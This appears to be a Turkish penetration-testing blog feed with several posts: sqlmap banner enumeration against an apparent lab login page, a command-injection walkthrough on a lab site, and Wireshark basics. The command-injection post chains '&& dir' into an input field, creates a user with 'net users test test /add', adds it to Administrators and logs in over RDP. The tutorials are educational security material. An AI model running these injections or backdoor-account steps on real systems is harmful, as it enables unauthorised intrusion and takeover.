<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Görüldüğü gibi yorum alanlarından alınan yorumlar neticesinde ciddi açıklıklar oluştu.Bu nedenle yorum alanlarının girdileri ve çıktıları mutlaka kontrol edilmelidir.</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code><br /></code></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-87524887653625807222014-09-30T09:21:00.002+03:002014-10-24T14:33:35.600+03:00Sqlmap ile Veritabanı Bilgisi Öğrenme<div style="border: 0px; color: #666666; line-height: 28.7999992370605px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; font-family: Arial, Helvetica, sans-serif;">sqlmap, web uygulamalarında sql injection açıklığı bulan araçtır.</span></div>
<div style="border: 0px; color: #666666; line-height: 28.7999992370605px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><span style="font-family: Arial, Helvetica, sans-serif; line-height: 28.7999992370605px;">sqlmap ile veritabanı bilgilerini öğrenelim.Bunun için</span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 28.7999992370605px;"> </span><span style="border: 0px; color: maroon; font-family: Arial, Helvetica, sans-serif; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; font-style: inherit; font-variant: inherit; font-weight: 600; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">- -banner</span></span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 28.7999992370605px;"> </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 28.7999992370605px;">parametresini kullanacağız.</span></span></div>
<div style="border: 0px; line-height: 28.7999992370605px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="background-color: #eeeeee;"><span style="color: #666666;">–></span><span style="color: red;">#<span style="border: 0px; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">sqlmap –url “http://fbhportal.com/mutillidae/index.php?page=login.php” –banner</span></span></b></span></div>
<div style="border: 0px; color: #666666; line-height: 28.7999992370605px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; font-family: Arial, Helvetica, sans-serif;">komutu ile sorgulayalım.</span></div>
<div style="border: 0px; color: #666666; line-height: 28.7999992370605px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; font-family: Arial, Helvetica, sans-serif;">Bu işlem biraz uzun sürüyor ama sonucu görelim.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixqLLQlarSWKBNMjYdddTHR04-o5esdaU8tpyX5aSSuqe77hS1SAtGxPD-P_xymZUB57fcGCWlx-SFoHEA-5d4MVfrPLNPiSbMbwengiQERQAdJrGLtn1XcAdg8Bluw4r6tYTXEaxkT-Y/s1600/sql11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixqLLQlarSWKBNMjYdddTHR04-o5esdaU8tpyX5aSSuqe77hS1SAtGxPD-P_xymZUB57fcGCWlx-SFoHEA-5d4MVfrPLNPiSbMbwengiQERQAdJrGLtn1XcAdg8Bluw4r6tYTXEaxkT-Y/s1600/sql11.png" height="347" width="400" /></a></div>
<div style="border: 0px; color: #666666; line-height: 28.7999992370605px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-91469192050164822052014-09-25T12:20:00.000+03:002014-10-24T14:33:21.957+03:00Command Injection Açıklığından Bilgisayara Sızma<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong>Command Injection;</strong> web uygulamalarında genellikle ping atma ve dns sorgulama tarzı işlemleri gerçekleştirmek için kullanılan alanlardan sistemin komut satırında sistem kodu çalıştırmaya olanak sağlayan bir açıklıktır. Gerek windows gerekse de linux sistemlerde çalıştırılan sitelerde bu açıklık ile sisteme çok rahat bir şekilde sızılabilinir.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Qwasp üzerinden bir örnek ile bunu gösterelim. Firewall kapalı olan bir XP bilgisayarda kurulu olan sitede Commnad Injection açığı varsa bilgisayara nasıl sızabiliriz.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWll1GNJOYyXJDne8Evpz0wEgRAFCGFvtkGwoG_SeKFZf4u5zHe8bDjvkJxq5mvWlmeAlcHQ9nWPIKEcQbrlQ4i_DSpcj5i2K-qzpAGkNBxNHZbt5jiTENcCcAWvPZjsW5ktm8GxUnopo/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWll1GNJOYyXJDne8Evpz0wEgRAFCGFvtkGwoG_SeKFZf4u5zHe8bDjvkJxq5mvWlmeAlcHQ9nWPIKEcQbrlQ4i_DSpcj5i2K-qzpAGkNBxNHZbt5jiTENcCcAWvPZjsW5ktm8GxUnopo/s1600/1.png" height="187" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<a name='more'></a><br /><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Sitede normalde DNS sorgulamak için kullanılan input alanından ping attığımızda yukarıdaki sonuç çıkıyor. Demek ki yazdığımız kodları çalıştırıp sonucu ekrana basıyor.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Bizde sistemin linux mü yoksa windows mu olduğuna karar vermek için <b>"uname -a"</b> komutunu yazarız ya da <b>nmap</b> ile işletim sistemi taraması yaparak sonuca göre linux mü yoksa windows mu olduğuna karar veririz.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Eğer<b> windows</b> ise "<b>&& dir</b>" komutu ile bulunduğumuz dizini listeyebiliriz.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfB60EheLEMaNr5mN6cRFLPjaidMNdzgqgeHne7aPhSinZO9hR9zHNlV7nOf3MNJzy2RdXpta6O_IH7v1fg3qwF2duhKr7K3bg2LCQ8CoOHZt38KsfWx58OoZLm__zw_o88xh7pAmRTu0/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfB60EheLEMaNr5mN6cRFLPjaidMNdzgqgeHne7aPhSinZO9hR9zHNlV7nOf3MNJzy2RdXpta6O_IH7v1fg3qwF2duhKr7K3bg2LCQ8CoOHZt38KsfWx58OoZLm__zw_o88xh7pAmRTu0/s1600/2.png" height="196" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Windows sistem üzerinde kurulu olduğunu varsayarak işlem yapalım. Yazdığımız komutların(birden fazla komutun art arda) işlenmesi için windows sistemlerde <b>" && "</b> kullanılırken linux sistemlerde <b>" ; "</b> kullanılır.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Aşama-1: Windows sistemde kullanıcı oluşturalım... <b>"net users test test /add"</b></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2Q4Fp6ddTMbwdyzLDuUGpP7-ZS7rywBWHUoUM6WgofGP0bvG8BFpfjwgtx36PgIGs_SLbLcAz1686V8BJgSCmDnAnV93OHLVjAnsISeAuVJt9nUemR2SHfBgIUsga5DE2UwNBgffSPl8/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2Q4Fp6ddTMbwdyzLDuUGpP7-ZS7rywBWHUoUM6WgofGP0bvG8BFpfjwgtx36PgIGs_SLbLcAz1686V8BJgSCmDnAnV93OHLVjAnsISeAuVJt9nUemR2SHfBgIUsga5DE2UwNBgffSPl8/s1600/3.png" height="177" width="400" /></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<b><br /></b></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Resimde de görüldüğü gibi komut başarılıyla tamamlanmıştır.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Aşama-2: Oluşturduğumuz kullanıcıyı yetkilendirelim.<i> Administrators </i>grubuna dahil edelim.Bunun yanında <i>domain grubuna</i> veya <i>Remote Desktop User</i> grubuna da ekleyebiliriz. Hangisi bizi sisteme sızdırabilirse onu deneyeceğiz.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjd7Dsq52tAPWrMUhF7ByceQp8cQPkJmYLgWW_mEMcOdR9nI5SekiwFuqhjotEuzpiddEqcpWkWlen7Ojy5MUQbPmQPmXDiJVr2ULUs-T4K2gUCjeFclfijog37PY9OPACCsvxDpOmAaYA/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjd7Dsq52tAPWrMUhF7ByceQp8cQPkJmYLgWW_mEMcOdR9nI5SekiwFuqhjotEuzpiddEqcpWkWlen7Ojy5MUQbPmQPmXDiJVr2ULUs-T4K2gUCjeFclfijog37PY9OPACCsvxDpOmAaYA/s1600/5.png" height="180" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Kullanıcımız şimdi administrator yetkili oldu. Bu kullanıcı ile sisteme RDP yapalım.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Sitenin bulunduğu IP 192.168.0.36.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Kullanıcı adı:test</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Password:test</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ42eCvapu3Pj7_xaxkWQhoKsajXVAgO8PoeuluTncOWlv7cSUsrng9z3361CjZV3Bw0s4WnmdrSMRmuMQKkr2cBq_91cBDbtu9x3RoAYLp0U4HcqsKNrXANo8Cp4CSFUe8VXRDXdczt4/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ42eCvapu3Pj7_xaxkWQhoKsajXVAgO8PoeuluTncOWlv7cSUsrng9z3361CjZV3Bw0s4WnmdrSMRmuMQKkr2cBq_91cBDbtu9x3RoAYLp0U4HcqsKNrXANo8Cp4CSFUe8VXRDXdczt4/s1600/4.png" height="207" width="400" /></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Yukarıdaki resimde de görüldüğü oluşturduğumuz "test" kullanıcısı eklenmiş.</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj969Bekk2dw3Xz8aEdBDUyE4EeHCRtw2zIo97zDnTWHn069BuLBoTLFNn_k_H8iGLy8J9UXEdd-S53xnpB5PwXSSznjt3dsraq0pCRh1zrdRZ6gYdlVyeGOJ5S_OfXGgvfYi-XWUJaa-0/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj969Bekk2dw3Xz8aEdBDUyE4EeHCRtw2zIo97zDnTWHn069BuLBoTLFNn_k_H8iGLy8J9UXEdd-S53xnpB5PwXSSznjt3dsraq0pCRh1zrdRZ6gYdlVyeGOJ5S_OfXGgvfYi-XWUJaa-0/s1600/6.png" height="337" width="400" /></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-72506716076475488722014-09-23T09:47:00.001+03:002015-01-20T22:23:40.839+02:00Wireshark Nedir,Nasıl Kullanılır?<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Bilgisayara bağlı olan her türlü ağ kartlarındaki (Ethernet kartı veya modem kartları) tüm TCP/IP mesajlarını analiz edebilen bir programdır. <span id="more-2252"></span>Wireshark, günümüzde çok amaçlı kullanılır. Şebeke problemlerinde sorun çözmek, güvenlik problemlerini sınamak, uygulamaya konan protokollerde oluşan hataları onarmak veya arındırmak, ağ protokolünün içerisindeki bilgileri öğrenebilmek için Wireshark programı kullanılır.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong>Wireshark Özellikleri</strong></span></div>
<ul style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li>Unix ve Windows işletim sistemleri için uygundur.</li>
<li>Yerel ağ arayüzünden paketleri tutar, ayrıntılı bir şekilde protokol bilgileriyle görüntüler.</li>
<li>Tutulan paketleri kaydetme özelliği vardır.</li>
<li>Çeşitli kriterlerde paket arar ve filtreler (süzer).</li>
<li>Alınan veya gönderilen paketleri filtrelemeyi baz alarak renklere ayırır ve katagorize eder.</li>
<li>Çeşitli istatistikleri, yapılan ayarlar doğrultusunda, kullanıcıya sunar.</li>
<li>Birçok protokol için şifre çözme desteği sunar. Örneğin;<ul>
<li>IPsec, Internet Protocol Security (İnternet Güvenlik Protokolü)</li>
<li>ISAKMP, Internet Security Association and Key Management Protocol (İnternet Bağ ve Şifre Yönetim Protokolü)</li>
<li>Kerberos</li>
<li>SNMPv3, Simple Network Management Protocol Version 3 (Basit Ağ Yönetim Protokolü Sürüm 3)</li>
<li>SSL, Secure Sockets Layer (Emniyetli Yuva Katmanı)</li>
<li>TLS, Transport Layer Security (Taşıma Katmanı Güvenliği)</li>
<li>WEP, Wired Equivalent Privacy (Kabloya Eşdeğer Mahremiyet)</li>
<li>WPA, Wi-Fi Protected Access (Wi-Fi Korumalı Erişim)</li>
<li>WPA2, Wi-Fi Protected Access 2 (Wi-Fi Korumalı Erişim 2)<a name='more'></a></li>
</ul>
</li>
</ul>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong>Wireshark Kullanımı ile ilgili Örnekler</strong></span></div>
<ul style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li>Ağ trafik tespiti</li>
<li>Veri madenciliği</li>
<li>Saldırı tespiti</li>
<li>Port tarama tespiti</li>
<li>Bağlantı sorunu tespiti</li>
<li>Casus yazılım tespiti</li>
</ul>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong>Wireshark Kullanımı</strong></span></div>
<br />
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<a data-mce-href="http://fbhportal.com/wp-content/uploads/2014/07/w1.png" href="http://fbhportal.com/wp-content/uploads/2014/07/w1.png"></a></div>
<br />
<div style="-webkit-text-stroke-width: 0px; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<strong>Aşama-1: </strong>Açılış ekran görüntüsü</div>
<div style="-webkit-text-stroke-width: 0px; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl2ejNK7yErjP9RzLm7dQ7pC7NpVOGEATaDWe3BNqZiTvLVl0p7DdO1Hs-B_PFSjsBg-ETzqxb_sIjQQOAuoerWTAMwoqny4VptopYl9VwnULo9k3lHPXx_dhsJ5vECuihfs7L2k3SdAk/s1600/w1-1024x537.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl2ejNK7yErjP9RzLm7dQ7pC7NpVOGEATaDWe3BNqZiTvLVl0p7DdO1Hs-B_PFSjsBg-ETzqxb_sIjQQOAuoerWTAMwoqny4VptopYl9VwnULo9k3lHPXx_dhsJ5vECuihfs7L2k3SdAk/s1600/w1-1024x537.png" height="208" width="400" /></a></div>
<div style="-webkit-text-stroke-width: 0px; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<strong style="background-color: white;">Aşama-2: </strong><span style="background-color: white;">Dinlenecek network yapısının seçilmesi gerekiyor. "Interface List" seçeneğinden listeye ulaşabilirsiniz. </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiczvK2-gVtHW2hDLKNTnxl34d2zCUwrVb8-8FPktrCa88y-dvdVQTMib0U-aazm0jlrEyFN2Pwp2Lu0IVkXhSopYx-XNSUj5VL77cllO5BaRpSM8HGdw-Ewzdv4YuMcCuSQETJwB2Lk0/s1600/w2-1024x381.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiczvK2-gVtHW2hDLKNTnxl34d2zCUwrVb8-8FPktrCa88y-dvdVQTMib0U-aazm0jlrEyFN2Pwp2Lu0IVkXhSopYx-XNSUj5VL77cllO5BaRpSM8HGdw-Ewzdv4YuMcCuSQETJwB2Lk0/s1600/w2-1024x381.png" height="148" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> </span><strong style="background-color: white; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><span style="color: #333333;">Aşama-3:</span><span style="color: red;"> </span></strong><span style="background-color: white; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><span style="color: red;"><b>"Start"</b></span></span><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> butonuna basınca trafik dinlenmeye başlanır.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih5en-iAcdxWDZg6q4gWzbMHA-TlU36LzuwwBVvLs4D-DrFv1XG9g3RqJk7u5JnG5ytrbizAM2w3fH-P3YfNpi6_GbigWg60MrYKCqQu0-SiveE1500xaTEviJAsM_bGvr1UYUZ3L84qc/s1600/w5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih5en-iAcdxWDZg6q4gWzbMHA-TlU36LzuwwBVvLs4D-DrFv1XG9g3RqJk7u5JnG5ytrbizAM2w3fH-P3YfNpi6_GbigWg60MrYKCqQu0-SiveE1500xaTEviJAsM_bGvr1UYUZ3L84qc/s1600/w5.png" height="47" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<strong style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Aşama-4:</strong><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> Akan trafikten bir parça.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje7Txp_RtmpAv91BhDADnDwR029YiT3PTqFrch6juoC_AipCSHkTQFSyz6wTsV-W-rYpRglpr18Bpu8z9ZPz7iJvfVUUfLtTJl-V2477hEHuNSNOnR8Z5TpQn-x_zmgqTtdz222w_8rEk/s1600/w6-1024x359.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje7Txp_RtmpAv91BhDADnDwR029YiT3PTqFrch6juoC_AipCSHkTQFSyz6wTsV-W-rYpRglpr18Bpu8z9ZPz7iJvfVUUfLtTJl-V2477hEHuNSNOnR8Z5TpQn-x_zmgqTtdz222w_8rEk/s1600/w6-1024x359.png" height="140" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span data-mce-style="text-decoration: underline;" style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px; text-decoration: underline;"><strong>Wireshark Yardımcı Alanlar</strong></span><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> Online sitesi,yardımcı kaynaklarına aşağıdaki resimdeki alanlardan ulaşabilirsiniz</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCdPeb5t33lqDdj5OMfpSLBQuZ4xnQPEkjXFWuiWFe7lcug1WYSgiQh6_2zKLJyIKx1LmiUlOGhXwQNl0GwsDAgCUq__C3rOW4nzEL-xzwe_uyrDoTRlPgP3n7iMhiWznpcMMxaLb_ZrE/s1600/w4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCdPeb5t33lqDdj5OMfpSLBQuZ4xnQPEkjXFWuiWFe7lcug1WYSgiQh6_2zKLJyIKx1LmiUlOGhXwQNl0GwsDAgCUq__C3rOW4nzEL-xzwe_uyrDoTRlPgP3n7iMhiWznpcMMxaLb_ZrE/s1600/w4.png" height="189" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Kaydedilmiş network trafik dosyasını<b> (.pcap ve desteklediği formatlar) "Open"</b> sekmesinden açabilirsiniz.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjkkvsp3kTs0KmgH0PKnETKeaDaY8fH8POTT4byJif2NvQ4KypdnMg1tOn8sw30aMrSF5j3dvxxvR0m3os0GrI9wYL_z-o__YtaVPcLIhzGSogMzwQHMR2W2rxXcqku0hB8-vPRIUhiH8/s1600/w3+(1).png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjkkvsp3kTs0KmgH0PKnETKeaDaY8fH8POTT4byJif2NvQ4KypdnMg1tOn8sw30aMrSF5j3dvxxvR0m3os0GrI9wYL_z-o__YtaVPcLIhzGSogMzwQHMR2W2rxXcqku0hB8-vPRIUhiH8/s1600/w3+(1).png" height="199" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white;"><br /></span></div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-62561860067093647522014-09-23T09:39:00.000+03:002015-01-20T22:23:40.831+02:00Wireshark Filtreleme Komutları<div data-mce-style="color: #000000;" id="Examples" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;">Örnekler</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Network trafiği içerisinde filtreleme yapmak wireshark ın en önemli özelliklerindendir.Bu filtrelemeyi basit,anlaşılır kodlarla yapıyor.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
